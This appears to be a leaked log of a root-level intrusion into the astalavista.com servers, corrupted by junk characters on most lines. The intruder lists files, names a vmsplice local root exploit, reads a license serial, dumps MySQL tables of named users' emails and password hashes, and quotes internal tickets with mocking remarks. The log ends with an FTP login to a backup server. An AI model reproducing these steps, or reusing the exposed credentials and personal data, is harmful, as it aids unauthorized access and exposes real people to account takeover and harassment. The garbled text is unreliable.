drwx–x–x 10 com com 4096 Apr 28 12:40 .
8 h; \, D1 w6 `& R* edrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..2 x$ d3 C `4 p0 U+ S, |# L
drwx—— 2 com com 4096 Jun 4 04:04 backups
# S1 t( s; r. [5 {4 M-rw-r–r– 1 root root 2419504 Sep 28 2007 backup.sql* w5 _( z* y, W% I( R' {
drwxr-xr-x 2 com com 4096 May 12 15:20 backup_system% u! y5 g+ V0 Q; W i+ b2 ^
-rw——- 1 com com 21880 Jun 2 08:07 .bash_history( N6 w+ N# o) P0 S# f
-rw-r–r– 1 com com 24 Sep 24 2007 .bash_logout/ Z2 d# V6 \( Y+ `$ W
-rw-r–r– 1 com com 176 Sep 24 2007 .bash_profile
2 P& z$ J( }+ r% C% v-rw-r–r– 1 com com 124 Sep 24 2007 .bashrc
# d/ r0 _' r1 ?2 H7 b3 [drwx–x–x 3 com com 4096 Jan 29 2008 domains; _ P# l/ l, E
-rw-r–r– 1 com com 16409 Jul 16 2008 FWUser.class.php.fixed8 q8 A7 e! ^7 _# T9 R7 S
drwxrwx— 3 com mail 4096 Jan 6 19:24 imap
9 O2 r! b; @7 Z$ [, g, d) ?-rw——- 1 com com 69 Nov 18 2008 .lesshst: j& a- b/ b* ? I ?( n+ t$ `, p( k
drwx—— 2 com com 4096 Sep 24 2007 mail1 w( _, A9 ]" N) e0 K, \2 J) R
-rw——- 1 com com 13970 Mar 28 21:42 .mysql_history
1 y1 k5 H1 f, s8 D5 fdrwxr-xr-x 2 com com 4096 Aug 20 2008 .ncftp# c* X1 Y0 e1 }! C+ F
lrwxrwxrwx 1 com com 37 Sep 24 2007 public_html -> ./domains/astalavista.com/public_html
2 N6 L$ b/ j. C+ X9 Z! K-rw-r—– 1 com mail 34 Sep 24 2007 .shadow
. Y2 v; ?/ V; l6 N; {drwx—— 2 com com 4096 Aug 26 2008 .ssh
1 D8 Q4 p9 H0 u* l-rwx—— 1 com com 8515 Feb 10 2008 t
/ Q0 @% `! O. p( C" k-rw-rw-r– 1 com com 6265 Feb 11 2008 t.c" X5 A$ p. D9 s$ b- u" b6 c
drwxrwxr-x 2 com com 4096 Jan 30 15:47 tmp' O) z0 G+ @) H9 A
-rw-rw-r– 1 com com 617 May 20 2008 .toprc' g* X# L! j8 `4 S
-rw-rw-r– 1 com com 141851766 May 19 2008 version2-backup-20080519-0900.sql. E9 G. D f& k4 s$ v
-rw——- 1 com com 16629 Mar 28 21:46 .viminfo
" ~% x" H* i! D/ M) m* @) d-rw-rw-r– 1 com com 51 Aug 25 2008 .vimrc
) l* G* D- k2 n9 U0 Z7 c9 c3 C
& Z! _1 z* A3 i* N& a/ b: Ysh-3.2# head t.c
" ?5 k! r7 f+ Z) c1 e/*
7 T5 O$ ~; R: S5 k9 a1 ]* jessica_biel_naked_in_my_bed.c7 q. c- f% p; \$ W, z4 A" z
*
) i" z$ P1 N& K) f- B; f* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.# d2 E3 s4 U H+ h
* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
# {; E0 u( w2 S' L) S6 P: {+ L* Stejnak je to stare jak cyp a aj jakesyk rozbite.: k4 g) x( Q ^2 T, P# ^; l- B
*/ B2 v9 R1 ]# O: O. ^
* Linux vmsplice Local Root Exploit
, F8 q: J" I8 @# x* By qaaz
. z' S8 w6 ]- ^ q, k! G9 L5 m$ @/ ]*& b- T! l( H; s( n
( q" _6 ]( V2 `4 M( O. i
sh-3.2# cd /6 q+ h4 ~7 B7 r% e, } _
sh-3.2# ls -la
3 t, R, u' C2 ?" A/ ~total 360+ m& G) v: ~: h4 ^0 |/ ?
drwxr-xr-x 25 root root 4096 Jun 3 02:43 .
7 |' z, v$ b) p. Adrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
@* M1 l# D: Q; f( O U$ }; o* r-rw——- 1 root root 10240 Jun 3 02:39 aquota.group; P g, X3 H. ^- \2 B7 ?" @
-rw——- 1 root root 10240 Jun 3 02:39 aquota.user% S5 l" A) D! k% [3 n: ?
-rw-r—– 1 root root 819 Jul 17 2008 astalavista.us.db0 b8 k0 L. F: T7 o# E
-rw-r–r– 1 root root 0 Jun 3 02:43 .autofsck( }; F8 w; t3 X% ]. C
-rw-r–r– 1 root root 0 Sep 16 2007 .autorelabel
1 V, N0 @ [" B$ V. _6 \drwxr-xr-x 3 root root 4096 Dec 29 2007 backup1 g1 k# k* y- l2 J& e9 C8 d
drwxr-xr-x 2 root root 4096 Jun 4 04:03 bin
: P' c8 r/ i. E+ ]1 |( o9 @, O& jdrwxr-xr-x 5 root root 4096 Jun 2 14:06 boot9 W# ~9 ]8 e1 ^2 t( D( C
drwxr-xr-x 11 root root 3620 Jun 3 02:43 dev3 a6 b1 D) Z1 M* }* Q
drwxr-xr-x 84 root root 12288 Jun 4 03:16 etc
) M! h! H: q1 s+ ?% Odrwxr-xr-x 14 root root 4096 Mar 11 17:56 home
* j8 _5 W; I" X; X+ g- l-rw-r–r– 1 root root 13387 Mar 20 2008 httpd.conf3 D9 e( E4 n/ ^8 v: H+ _
drwxr-xr-x 11 root root 4096 Jun 4 04:02 lib
2 t+ {4 P( s% I8 v( i2 g' cdrwxr-xr-x 7 root root 4096 Jun 4 04:03 lib649 ?5 X/ s8 W$ ?1 ?0 X2 @
drwx—— 2 root root 16384 Sep 11 2007 lost+found! \; H3 b/ ~7 o/ J2 C4 K
drwxr-xr-x 2 root root 4096 Mar 11 17:56 media
: f' s' U- O5 @: f. K: P* ]6 Ydrwxr-xr-x 2 root root 0 Jun 3 02:43 misc# P7 V8 V5 P$ @. q+ ^
drwxr-xr-x 2 root root 4096 Mar 11 17:56 mnt- L' v. X F3 V7 T' @! A
-rw-r–r– 1 root root 5859 Feb 3 2008 mrtg.cfg
6 U* @% a: F- Y" W$ j' U4 Vdrwxr-xr-x 2 root root 0 Jun 3 02:43 net
2 a1 f+ i- b Z# h: ?drwxr-xr-x 3 root root 4096 Mar 11 17:56 opt
4 l: ?- T+ Z7 w' l4 }dr-xr-xr-x 264 root root 0 Jun 3 02:42 proc& f2 d2 \ X. y! {9 _( [
drwxr-x— 15 root root 4096 Jun 4 08:40 root- c; x$ U2 ^& f4 r, k, w: u
drwxr-xr-x 2 root root 12288 Jun 4 04:03 sbin; k7 E0 B4 k' J
drwxr-xr-x 2 root root 4096 Mar 11 17:56 selinux8 R3 i2 z1 N; ^% f
drwxr-xr-x 2 root root 4096 Mar 11 17:56 srv
$ m3 t( s7 Z& j/ {( }drwxr-xr-x 11 root root 0 Jun 3 02:42 sys/ r- g D3 U* J5 N2 J
drwxrwxrwt 4 root root 122880 Jun 4 10:35 tmp
) f9 X: m3 \1 S7 o: _& I3 n4 M3 rdrwxr-xr-x 16 root root 4096 Jun 2 13:56 usr& I7 n' C' o1 B" B3 R6 _
drwxr-xr-x 26 root root 4096 Jun 4 03:16 var/ R2 u T0 i0 s1 q
- X- ?' s& N8 [ M' K# I% I
sh-3.2# cd opt
# l+ u5 M# u8 p! j. z0 z3 S0 Qsh-3.2# ls -la- l2 u, ^& E$ m! Q1 q1 L+ N% l
total 20% H4 i2 l: z% s
drwxr-xr-x 3 root root 4096 Mar 11 17:56 .
% |9 q5 R* T8 x7 i; Z+ Udrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..8 O8 i" P4 s7 s
drwxr-xr-x 15 root root 4096 Mar 20 2008 lsws# z$ v/ j- {' T9 Q I0 W+ A. S
$ }# Y+ \) n- \( t. Ysh-3.2# cd lsws/
# c, p( G2 r5 O- J$ lsh-3.2# ls -la
; {: N' ~ k/ l" x7 }total 108, \! f$ d5 J( y% ? O C( B# `
drwxr-xr-x 15 root root 4096 Mar 20 2008 .
% m3 R2 B$ R2 s+ |drwxr-xr-x 3 root root 4096 Mar 11 17:56 ..
0 h1 D( q) g' Y) I+ Edrwxr-xr-x 8 root root 4096 Mar 20 2008 add-ons; c8 x {9 k g
drwxr-xr-x 13 root root 4096 May 29 15:10 admin
" |' C7 i7 a: qdrwxr-xr-x 5 apache apache 4096 May 29 15:10 autoupdate
+ R1 |" S7 ~- q1 A# Q+ _drwxr-xr-x 2 root root 4096 May 29 15:10 bin# ~/ P: E& ~; T
drwx—— 4 apache apache 4096 Jun 3 02:43 conf
! @2 p6 d; d! @4 xdrwxr-xr-x 7 apache apache 4096 Mar 20 2008 DEFAULT
9 D- ]# W1 r6 Bdrwxr-xr-x 2 root root 4096 Sep 15 2008 docs2 L" H9 b) Q2 b* X% F% U6 M9 a( V
drwxr-xr-x 2 root root 4096 May 29 15:10 fcgi-bin
" R; \1 o. K9 b7 F' edrwxr-xr-x 2 root root 4096 Sep 15 2008 lib
) y; |+ v- B- f* g# g6 p0 d-rw-r–r– 1 root root 6959 May 29 15:10 LICENSE
1 o6 D$ x) B y0 n-rw-r–r– 1 root root 2214 May 29 15:10 LICENSE.OpenLDAP) a4 T% ~9 ^) f0 d* f; x6 [: E6 Y
-rw-r–r– 1 root root 6279 May 29 15:10 LICENSE.OpenSSL6 f0 U6 }. x& a7 C0 \ u
-rw-r–r– 1 root root 3208 May 29 15:10 LICENSE.PHP
6 N4 a) N% x0 b! T9 A, O& w5 Idrwxr-xr-x 2 root root 20480 Jun 4 09:55 logs7 p, K' e: ]% g8 V
drwxr-xr-x 2 root root 4096 Mar 20 2008 php, N" `0 g" b3 v; {: ]' A
drwx—— 2 apache apache 4096 Mar 20 2008 phpbuild
! ^" e8 R' s6 h7 y0 u9 y8 \9 M2 pdrwxr-xr-x 3 root root 4096 Mar 20 2008 share
5 g. m9 N+ ^! ?-rw-r–r– 1 root root 6 May 29 15:10 VERSION, F* c, o5 Y: d. M0 z4 A* i( J- p
& d% k# [% A3 Q! X Lsh-3.2# cd conf
; j: c/ B' N- E7 E5 j7 v2 M% p4 Nsh-3.2# ls -la1 c0 W4 W, U, |
total 48
% @+ r p+ S# D+ zdrwx—— 4 apache apache 4096 Jun 3 02:43 .
# N+ U: `1 g* F& p/ g9 cdrwxr-xr-x 15 root root 4096 Mar 20 2008 ..
' k( [6 [/ F0 [( y7 e3 Udrwx—— 2 apache apache 4096 Mar 20 2008 cert
/ z$ O; ~5 M8 V& [( x/ m3 p4 i$ a! d-rw-r–r– 1 apache apache 6668 May 29 15:13 httpd_config.xml
/ ]- W0 I" U3 r; T8 @-rw——- 1 apache apache 6613 May 27 18:33 httpd_config.xml.bak
' ]' {: m' g7 p- F-rw-r–r– 1 root apache 0 Jun 3 14:11 .last7 c2 I/ J- C: u9 v6 G
-rw——- 1 apache apache 256 May 29 15:10 license.key! d; E$ K- m' b1 J8 k
-rw——- 1 apache apache 256 Mar 21 2008 license.key.old
+ Z( ^# ~: O* M4 l! v J-rw——- 1 apache apache 3320 Mar 20 2008 mime.properties
* R. O- v- @3 a5 [. X) y6 E-rw——- 1 apache apache 20 May 29 15:10 serial.no
/ L5 C* n& i4 w0 v4 F) _drwx—— 2 apache apache 4096 Mar 20 2008 templates( K! a- g# e! P8 C3 s
3 ?3 R1 s! o/ H! L6 U) v2 m1 T: O& msh-3.2# cat serial.no
, t3 F' n3 U+ m9 M# d3 sIbDl-oVsO-CKqL-wVRa
8 ^9 P% e# s) A% Y( q! e# F6 e3 `9 [, R2 M! {
sh-3.2# mysql
: a4 [1 f; o. l! iWelcome to the MySQL monitor. Commands end with ; or \g.
3 T- i" ^2 b6 ?: JYour MySQL connection id is 286844
5 x* S9 r- M J& i8 V3 N3 ?Server version: 5.0.45-community-log MySQL Community Edition (GPL)
) |" {& a3 Q- f1 N e. F+ P7 J8 a& Y5 P9 X
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
s) X" c5 \' i. L0 q& g2 [# a* N" i; c) w1 \
mysql> show databases; K$ q. ?, W/ z/ l1 w5 u( c
+———————–+
1 e$ K( l P# c( A) Y4 d| Database |) z( e7 M$ R4 U" B% n4 S5 A- _1 y
+———————–+
) K/ {% G) ^$ e; W$ N| information_schema |
+ }* a; `+ b6 `2 h; b| astanet_ads |
3 D/ O r+ }& p8 i- }| astanet_mailing_lists |, S4 L0 K) }; g3 m! e
| astanet_mediawiki |
" ]1 k; k i/ ^5 O- X2 z1 E| astanet_membersystem |
' t, R# Q& P$ r) U% [| com_contrexx |9 }3 ]" A5 S7 M [0 N
| com_contrexx2 |
/ X9 m: Q, `& _; d| com_contrexx2_live |& H* v" S9 w6 l5 Q+ Q! E6 F1 i* z
| da_roundcube |
( s! D! \# f3 l4 F" k& x; o& z| dolphin |& |9 }7 E2 h" ?; u
| ideapool |
+ H1 o' K; k! {( || mysql |
1 l0 A$ }5 k$ g# q2 @) P. N L5 @| test |
7 K8 i' u# u# [& X. N# Y4 \| yourmaster |3 w1 M6 H8 B0 ]" O
+———————–+8 T7 L+ f6 J+ e
14 rows in set (0.00 sec)
) d& {3 V) K8 c3 F+ D
0 ?* \7 \- t, s1 q- k. [mysql> use ideapool
7 U: m# c3 h( N+ S" NDatabase changed
9 R: _6 c: {+ x' Cmysql> show tables;, g- {& z) H! l; z4 W' X8 [+ y
+———————————–+7 P8 M2 j+ u, S, u
| Tables_in_ideapool |
3 {! I$ [$ s" G+———————————–+; T" o" ^; I7 _9 a! I" d% E
| eventum_columns_to_display |# m. e+ M( m; R/ z, a
| eventum_custom_field |, W3 U6 ?6 W+ E
| eventum_custom_field_option |
# w0 F7 V' `6 a7 [- s* c8 h/ P| eventum_custom_filter |* N" z. }" J! b7 o& S
| eventum_customer_account_manager | e; j# R" j5 w/ Y8 d& ?
| eventum_customer_note |
* O0 k& q1 v% L2 s| eventum_email_account |$ R. k _. a" ~* l3 @4 [' w
| eventum_email_draft |* z/ Q! ~) {4 v& W5 X. Y) k: |
| eventum_email_draft_recipient |
2 t1 F- q0 w4 u& S| eventum_email_response | z1 }+ ~ Y6 o7 u; N# z0 `
| eventum_faq |
6 N5 U' D. K+ a" S4 F, H| eventum_faq_support_level |; V# K" e8 P* C+ ?9 Z+ \6 r: M
| eventum_group |1 [( d- Q# l; V+ ^7 Y
| eventum_history_type |
. \/ u! c% o% R9 x+ U5 [ D6 M| eventum_irc_notice |
2 s8 C% s$ Q' [# L8 O, H$ C: l% e| eventum_issue |3 h; Y9 v- b: S
| eventum_issue_association |
8 W* Z" F( ?* p8 |9 E| eventum_issue_attachment |
/ @- O: J5 z" ]1 h2 d. Z0 {, x| eventum_issue_attachment_file |0 c5 G+ w# K6 B' s$ N2 f
| eventum_issue_checkin |
7 U+ I* l o) g* U| eventum_issue_custom_field |- T7 e: c# d9 d+ E9 F
| eventum_issue_history |$ ]$ u0 D. O" @ T o! B
| eventum_issue_quarantine |
9 f0 O* g/ Y: _& }( L: E+ }, a| eventum_issue_requirement |, z2 s/ r' t2 a% }! q6 _; O
| eventum_issue_user |
' D w- x& [0 b! V$ W0 i1 C| eventum_issue_user_replier | U% |! N/ h9 I# p9 \
| eventum_link_filter |; I& U4 x8 s" [4 v# ^
| eventum_mail_queue |7 r) q) z" D8 f$ c4 u. B
| eventum_mail_queue_log |
& f: x& \2 _9 }- {! o9 ~: ~8 |* o| eventum_news |
, X1 i7 G" I+ g' [' k| eventum_note |$ e0 R3 P, U* S& H
| eventum_phone_support |" x8 v7 s; v- W$ t( p4 z1 L
| eventum_project |
3 g5 e$ B- D6 M| eventum_project_category |
& [" j# Z7 u p6 K5 l| eventum_project_custom_field |
" B( H* D$ t8 ~& z, l| eventum_project_email_response |1 r: j. L, w6 p {/ @* M
| eventum_project_field_display |
. R8 s1 }% S8 s) n c+ y| eventum_project_group |
2 I" J5 R9 A3 l. N& S: M| eventum_project_link_filter |
3 e) Z: T$ i, X- s| eventum_project_news |
' i( @! C# _$ C; [5 g| eventum_project_phone_category |
- o' r" ^. K+ \% A% S| eventum_project_priority |
' p+ l* H0 X8 s) ^( B; A% e7 q| eventum_project_release |
# i1 A& V. Z; m| eventum_project_round_robin |
b0 Y% B2 n% {% P4 Y| eventum_project_status |* ^, i+ _, t4 }* s# z Q+ k0 v0 }
| eventum_project_status_date |
, d( X1 h& y8 e; z" ^| eventum_project_user |+ p! `: `; M8 Z3 t, P8 \ P$ {' M
| eventum_reminder_action |
8 ~! r3 o% F& N; {| eventum_reminder_action_list |; }, d. r# T+ O( \/ K) ]
| eventum_reminder_action_type |7 }3 r' G9 M \' y1 }) @# x
| eventum_reminder_field |
# K; D/ y6 x/ x2 g" Q( k| eventum_reminder_history |
+ D% n& j, ]+ r| eventum_reminder_level |' m$ I- S# A* m" u
| eventum_reminder_level_condition |/ Q4 z: ?3 |' W" N4 u9 B* o* n" |3 K4 H
| eventum_reminder_operator |0 q# Z1 c; T2 Y- O# M- q9 o
| eventum_reminder_priority |
4 ]6 b% r" s8 p% }1 V. _' ]' c) Y* L| eventum_reminder_requirement |% Z6 E$ k9 s" ~+ y- r6 ]+ \. S
| eventum_reminder_triggered_action |) a4 L; Z3 H( W# r7 C* S( T7 s
| eventum_resolution |4 F: B0 o5 F$ f' o- [: a" r
| eventum_round_robin_user |
: C- L O; Z+ g6 h2 u0 F| eventum_search_profile |! L3 D9 z0 B, B! `. w- Y. p& d' g
| eventum_status |
) x, d$ g3 a5 O0 h: X/ H" |' A| eventum_subscription |
4 B6 X; d5 Q# D| eventum_subscription_type |! D# E }- _0 f# ]) H
| eventum_support_email |
7 u* m$ ]5 x( X| eventum_support_email_body |
6 U1 d: I5 r5 h7 y3 q. c! O$ ~| eventum_time_tracking |
/ ], }+ \$ z/ g0 ?& m8 m| eventum_time_tracking_category |4 u3 a" B! P9 }
| eventum_user | F; J. o' _- v( m
+———————————–+7 k8 V& P" G/ L. k& P
69 rows in set (0.00 sec)$ w- g3 G* b4 l4 _0 L
) f# e: F8 Y' n% ~mysql> describe eventum_user;/ N8 ]" s; C, r6 L4 w. Y
+————————-+——————+——+—–+———————+—————-+
4 a* Q7 j, b: w; E: C8 d: J| Field | Type | Null | Key | Default | Extra |- @$ e$ {$ M/ {3 s5 Y# V% P+ ^
+————————-+——————+——+—–+———————+—————-+& S6 S" c4 o6 z
| usr_id | int(11) unsigned | NO | PRI | NULL | auto_increment |
! |+ y8 h, O' V/ W3 J| usr_grp_id | int(11) unsigned | YES | MUL | NULL | |
5 Q$ M1 f |# w* @# N| usr_customer_id | int(11) unsigned | YES | | NULL | |; k0 q X- K: t9 K( z7 s
| usr_customer_contact_id | int(11) unsigned | YES | | NULL | |' i5 Z/ A% t" b; E+ a
| usr_created_date | datetime | NO | | 0000-00-00 00:00:00 | |9 t2 }4 q7 F0 c/ ~5 Z4 H
| usr_status | varchar(8) | NO | | active | |
- }# Q2 {7 d7 w8 O+ x2 \1 _3 V| usr_password | varchar(32) | NO | | | |$ L" |& R3 y3 a5 Z
| usr_full_name | varchar(255) | NO | | | |& t+ I, `7 E. S& v; |) E
| usr_email | varchar(255) | NO | UNI | | |# z" N: q+ l: ~0 E' E
| usr_preferences | longtext | YES | | NULL | |+ s& D' k* h- P J# Y) L
| usr_sms_email | varchar(255) | YES | | NULL | |, c3 C3 L- I, W/ [ a& L' e
| usr_clocked_in | tinyint(1) | YES | | 0 | |" [% Q( V+ u' X0 i7 X: V, J. U, f! J
| usr_lang | varchar(5) | YES | | NULL | |
& P5 y4 o# _7 J% E. i/ R+————————-+——————+——+—–+———————+—————-+
0 Q9 |( l" T- f- U# \2 k6 S& X13 rows in set (0.00 sec)
2 F2 x, c: E- Z3 V6 c' V$ K+ y% v2 ^+ K2 S5 p
mysql> select usr_full_name,usr_email,usr_password from eventum_user;
+ L3 I; H) |8 L" Y+———————-+——————————-+———————————-+" \, l' \$ F; ~; Z$ r7 y
| usr_full_name | usr_email | usr_password |% A/ T3 }* m1 z, f! t# i
+———————-+——————————-+———————————-+1 g" q- d5 w! ?8 Z# G% u) ~: _
| system | 链接标记system-account@example.com | 14589714398751513457adf349173434 |5 X& ]1 K! U4 a/ y. f$ ~$ ?% n
| Developer (Paulo) | 链接标记paulo.santos@astalavista.ch | 26a35a1cf8895c27fb37ef4cf149f7bb |% r) _, f9 i( v: t
| Be1er0ph0r | 链接标记be1er0ph0r@gmx.de | 229766dc0ca1fb67160a8782321dfdce |! T! R+ M; X- W, b" J8 `
| Admin | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |- a7 U6 ?: k, i6 Q( J; w
| ADMIN | 链接标记admin@astalavista.ch | f6fdffe48c908deb0f4c3bd36c032e72 |8 A, Q2 L+ q1 n# T5 G% ^) Q
| USER | 链接标记user@astalavista.ch | 5cc32e366c87c4cb49e4309b75f57d64 |5 F" M% ?4 i+ e' O: k% v
| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com | f7735ab119023a8abb2301e67f81cd67 |# F6 J2 f. k% W
| Joao | 链接标记joao.pontes@astalavista.net | f805c071d7c823b937448c54c047b9fd |
6 [" \# j N, W2 ?| Pascal | 链接标记pm@astalavista.ch | e10adc3949ba59abbe56e057f20f883e |
' I" f$ {5 G1 B! ~ y| commander | 链接标记commander@astalavista.com | 932cd250918f881d41feb0b93883a926 |. o7 [% @4 M' E
| ishtus | 链接标记ishtus@astalavista.com | a587ffc88b3dbbba3fd2fe67af649ff0 | [8 a9 ~3 G: C" p- f4 n; M
| sykadul | 链接标记sykadul@astalavista.com | 20224a2f3eeb57a13a10b4df543c128e |
N4 q% c5 J! C6 J| Zach McElroy | 链接标记admin@badfoo.net | 33c5d4954da881814420f3ba39772644 |3 S! d! k$ b5 A3 {4 N
| usb | 链接标记usbenigma@hushmail.com | b513f22c3db6932855ad732f5f8a10a2 |
i1 B# a) R/ F| cyph3r | 链接标记cyph3r@astalavista.com | 6e1e50017a945e874d52ec91f9ab2cee |5 `* N1 r& r* ]" g3 @* I
+———————-+——————————-+———————————-+
- i0 k+ k' }' m& W! H' t9 _3 m" h+ Q/ t/ s15 rows in set (0.00 sec)
. l! }5 S3 N% X, I8 z
5 T" p0 d1 Z; @; M+ O! tmysql> select iss_description from eventum_issue where iss_id = 43;& {5 O3 E* r$ c n' S/ E
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
$ o% U( k, _: q: _| iss_description 1 r6 w8 v. J9 Z2 Z% f6 ?& @
|! s+ o7 z2 j4 b
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+! ^/ h) C& z- g, f! L5 N: ^
| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be
8 K$ w" z4 P. d/ kconnected for 90 mins… 120mins… so what i propose is something like:! L) Z* P# Z' e5 a1 }! _$ m
链接标记[url]http://www.surfthechannel.com/[/url]) g& s5 |+ c: u3 B5 _$ |7 p
since they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system
1 g- Z( ~6 O7 jlike podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t/ w' y5 {0 n- G/ Z) V) z0 U3 f
break any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off% g5 u+ X6 x! K O) I9 W" w
if they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…
: d. Q3 q* g5 a# }- m; a8 A) p8 D$ s0 w& X' `
We could also put advertisement during play on the flash video player itself… extra $$…
$ G& N; y, {; P0 [6 |' z5 _6 R3 m7 I+ ]; X% e0 K/ b
By sykadul |
$ x/ I! V4 A+ s6 r+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
4 K! g8 G2 I8 @1 row in set (0.00 sec)
) ?# w1 X0 H/ |. I- U
) \# F& W# m$ d// Money and extra $$ is all they care about. remember that.9 \3 n- f2 h( _1 V ]4 p
- X, u5 i) a `1 \2 a$ Y5 T2 [
mysql> select iss_summary,iss_description from eventum_issue where iss_id =42;
) l8 @# _# G0 p! `4 D, F2 f4 ^# M5 B9 C+————————+——————————————————————————————————————————————————————————————————————————————-+
3 |* |5 i: B0 U% X| iss_summary | iss_description
( d) m/ {3 g" O3 x( Z7 r|5 Y; p' }9 s8 Z
+————————+——————————————————————————————————————————————————————————————————————————————-+
5 j4 p# W1 \' T# i7 y$ w| Forum for REAL EXPERTS | Hello,1 y& Y6 F1 N; E6 f- f) z0 \
. k" h5 O' T' A# \$ L% \
Ishtus and I,- P; u4 _9 T3 F% D
2 U d* J; P: t1 ? y( {
Came up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide
* I+ P E6 g2 \% u: s/ IONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..
8 b+ _2 w" G& v5 g7 o, [2 L/ e! g1 P( g5 T+ ~
One example a friend of mine from coresecurity.com!
6 B2 T: w0 _0 x3 `7 f& ], }7 G, P' [- e. y
We could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..
- c" s3 W; j; T/ G9 w; z6 U* U1 _9 ]* Y
|
8 l' k5 H% |. H' a5 {, r$ Y9 K9 N+————————+——————————————————————————————————————————————————————————————————————————————+6 R) h' [% A1 d
1 row in set (0.00 sec)
, I- s5 O$ ^; T; m! Q. z/ [1 i" \9 G' O; A/ a6 o
// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…
( O' |# y3 n6 y+ j
1 I8 F9 Q# u$ i" e+ }5 ymysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;4 O% P& d2 U. ^- a8 m
+——————+———————————————————————————————+
7 [/ |4 u! W9 U| iss_summary | iss_description |
2 k9 C2 U1 \3 B) Z) m% P( \+——————+———————————————————————————————+
. Q3 X0 M# s* [7 u| Website guidance | Virtual Girl which guides you trought the website.& d: j+ D5 q1 `& Y6 U8 r
2 x2 T" e* c6 `We need a girl with who you can ( talk )!!!7 C; [" \8 S. ]. T* H9 d, F+ r( ?* V
Also for the News!
) e! { z" w2 c$ R' G! f w6 D6 m/ aSo my suggestion is a girl who read you the news loud if you like!
0 ]$ I; X% ]8 a, Tyou can choose between read yourselfe or she read it for you or both!8 ]* `" E' B& [7 ]& F: G) z
* L# h g3 ~ q0 E/ pGo to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!
+ k }( K1 G; p7 u9 M) N7 }; t0 G6 w. I0 o- ^7 s( A! g
Have a look on the example girls!!
! t8 H" P. h7 z9 c# [0 n1 u9 y
, |* u7 K% m$ }: R3 F链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]& W8 Q- n, m8 D* o7 W
& o5 I. I+ ?4 D/ T( c
or that2 p1 j* C" `( _ _1 q
8 G0 Q/ R, J1 s# R5 _0 W链接标记[url]http://www.yellostrom.de/[/url]/ f2 u- m1 r- Z/ T
( q2 d* M% j: w3 x' }( O
|$ o$ C7 [7 q' {) C' [* b* T& D
+——————+———————————————————————————————+, B5 q% V7 ^& ~; T' s5 S6 |" ?
1 row in set (0.00 sec)
6 W8 x) e. i% X+ o3 f* d. h4 e9 i/ a. L4 J% q1 R9 r+ r
// ha ha.4 |& z/ ?, \5 q$ i& p9 m
( N( i F4 R2 M. F
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;* U6 C( L" z0 D
+————————–+———————————————————————————————————–+
w d2 }* E+ L2 ?8 N7 P" ~* [8 n| iss_summary | iss_description |+ J8 I' n6 o) |6 a! Q a3 t- |( k
+————————–+———————————————————————————————————–+
8 c6 a7 m0 d7 z4 j' I| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name. |; {$ d3 n- C7 C8 B: B) F" z4 g, r
+————————–+———————————————————————————————————–+3 T9 ]3 E+ E+ @' S6 h
1 row in set (0.00 sec)' {, C- w n B+ r5 m+ [( R
' @& G! Z4 W: w4 Y// LOL.! R& |8 b9 H: W5 m$ c* n$ P v
! z7 z, M$ g4 l* p, umysql> exit- B. r* l& R+ p: m2 a% c* O/ A
Bye
% _8 o# p; y- p! ]) m
2 ]1 t% c6 U1 n: R( _& ysh-3.2# ftp 212.254.194.163# y" @) p J5 X6 Y& x2 d7 @
Connected to 212.254.194.163.
8 w: }0 W% z( O3 b; W3 \220 BackupCOM_VW FTP server ready.$ Y/ W7 z6 w$ j- [8 g
504 AUTH: security mechanism ‘GSSAPI’ not supported./ p9 `* ]. ~2 \ D9 B" ^# v3 [
504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.; }5 r; f: \' { P) n3 p
KERBEROS_V4 rejected as an authentication type: K& M% A( W$ `0 v+ J" v6 b- ^3 S: D
Name (212.254.194.163:root): astalavista.com
4 Y1 {$ b" a5 B0 p d. q( D* r- n+ P331 Password required for astalavista.com.+ J5 q6 B/ h; \/ k) Y+ {2 U: q
Password:
) O# C, A1 P' b! N+ V# D$ [230 User astalavista.com logged in.
6 o" `; h/ d/ E$ tRemote system type is UNIX.
. N- Y4 X0 }# fUsing binary mode to transfer files.' c( T9 G A) C: K6 b8 o& B1 t
ftp> ls -la% p, A) }/ y+ _+ h8 M0 }1 h1 _
227 Entering Passive Mode (212,254,194,163,2,188)
( O$ y0 m& Y. s r, A150 Opening BINARY mode data connection for ‘file list’.7 K( ]8 D$ g- W7 b
dr-x—— 1 root users 4096 Jun 4 06:13 astalavista.com' T& s) x. [+ q! O& U: @9 |
226 Transfer complete.
0 Y6 V5 P6 g" H2 d" n1 y' gftp> cd astalavista.com
# Y, e7 J% A W& f250 CWD command successful.# L, q1 u$ j' Q3 n5 J
ftp> ls -la9 [- h8 [7 T! }7 i8 g
227 Entering Passive Mode (212,254,194,163,2,189)
- c- W, L1 i6 p+ S- n150 Opening BINARY mode data connection for ‘file list’.
